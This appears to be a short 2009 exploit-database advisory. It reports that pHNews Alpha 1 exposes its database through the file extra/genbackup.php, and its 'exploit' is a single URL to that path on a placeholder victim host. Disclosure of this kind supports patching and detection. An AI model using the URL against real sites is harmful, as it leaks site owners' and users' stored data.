id: 4866
date: 02/17/2009
title: pHNews Alpha 1 (genbackup.php) Database Disclosure Vulnerability
author: x0r
cves: 

================================================================
pHNews Alpha 1 (genbackup.php) Database Disclosure Vulnerability
================================================================


#########################################################################################
[0x01] Informations:

Name           : pHNews Alpha 1
Download       : http://www.hotscripts.com/listings/jump/download/50111/
Vulnerability  : Db Discloure
Author         : x0r
Notes          : Proud to be Italian 
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/extra/genbackup.php

#########################################################################################
[0x03] Exploit:

Exploit: http://victim.org/extra/genbackup.php
########################################################################################



#  0day.today [2023-03-21]  #